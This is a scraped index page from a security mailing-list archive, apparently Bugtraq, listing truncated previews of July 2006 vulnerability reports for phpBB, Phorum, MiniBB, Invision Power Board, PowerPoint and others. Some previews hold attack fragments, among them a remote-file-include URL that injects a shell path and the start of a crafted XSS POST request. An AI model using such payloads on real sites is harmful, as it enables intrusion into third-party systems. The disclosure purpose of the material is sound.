|
|
Colapse all |
Post message
Re: phpbb 3.x sql injection (with global moderator rights) 2006-07-14 bugtraq neothermic com This issue has been fixed in CVS. I will also remind everyone that 3.0 is beta software and has not yet had a security audit, and therefore we do not recommend to use the beta in a live environment. I would also like to remind people that in future we would appreciate it if such reports could be [ more ] [ reply ] RE: MIMESweeper For Web 5.X Cross Site Scripting 2006-07-11 Erez Metula (erezmetula 2bsecure co il) Hi list, I've been asked the following question: "It sounds like the net impact of this vulnerability is that an attacker can steal cookies for a site the user isn't allowed to visit anyway. In other words, there aren't going to be any interesting cookies to steal. Is there more to this attack s [ more ] [ reply ] SubberZ[Lite] - Remote File Include 2006-07-14 ChironeX FleckeriX Gmail Com ################ Chironex Fleckeri ############################### #SubberZ[Lite] - Remote File Include #Find by Chironex Fleckeri #Mail/MSN: ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ################################################################## http://[site]/[path]/user-func.php?myadmindir=[Shell] [ more ] [ reply ] Microsoft PowerPoint 0-day Vulnerability FAQ document written 2006-07-14 Juha-Matti Laurio (juha-matti laurio netti fi) I have written FAQ document including 33 items about the recently reported 0-day vulnerability in PowerPoint. This vulnerability is being exploited by Trojan horse including keylogger features. The document entitled as Microsoft PowerPoint 0-day Vulnerability FAQ is located at my SecuriTeam Blogs s [ more ] [ reply ] Re: [Full-disclosure] ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton) 2006-07-11 Mailinglists (mozilla ids-guide de) The bug is confirmed and fixed, but it's up to the guys from sipfoundry to work on their changelogs ;-) TD> is there an official notification from sipX? TD> I dont see any mention to this vulnerability in the changelog TD> On 7/10/06, mozilla (at) ids-guide (dot) de [email concealed] <mozilla (at) ids-guide (dot) de [email concealed]> wrote: >> >> ERNW [ more ] [ reply ] MiniBB Forum <= 1.5a Remote File Include Vulnerabilities 2006-07-15 matdhule gmail com ------------------------------------------------------------------------ --------- MiniBB Forum <= 1.5a Remote File Include Vulnerabilities ------------------------------------------------------------------------ --------- Author : Matdhule Contact : matdhule (at) gmail (dot) com [email concealed] Application : Mi [ more ] [ reply ] Phorum 5.1.14 XSS SQL injection Vulnerability 2006-07-11 securityconnection gmail com Phorum 5.1.14 http://www.phorum.org -------------------------- Cross Site Scripting (XSS) -------------------------- POST http://target.xx:80/posting.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 447 message_id=0&forum_id=1&mode=<s [ more ] [ reply ] [SECURITY] Plain text password in Finjan Appliance 5100/8100 NG backup file 2006-07-11 finde_schwachstelle gmx net Plain text password in backup file ( Finjan Appliance 5100/8100 NG) The Version 8.3.5 is affected. In the new console function backup and restore the passwords are saved as plain text. The Finjan Appliance uses a Firebird database. The backup saves the database as text file. Samba and FTP passwo [ more ] [ reply ] XSS phpBB 2.0.21 in administration 2006-07-11 renatrix gmail com phpBB 2.0.21 XSS in administration ********************************** //-- By Blwood [renatrix (at) gmail (dot) com [email concealed]] //-- [ http://www.blwood.net ] //-- Style Admin ----------- Management & Create a theme Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_backgrou [ more ] [ reply ] |
|
Privacy Statement |
Product: Invision Power Board
Version: 2.1 <= 2.1.6
Vendor: INVISION Power Service
URL: http://www.invisionpower.com
VULNERABILITY CLASS: SQL injection
[Product Description]
Invision Power Board, an award-winning scaleable bulletin board system, written in PHP, uses S
[ more ] [ reply ]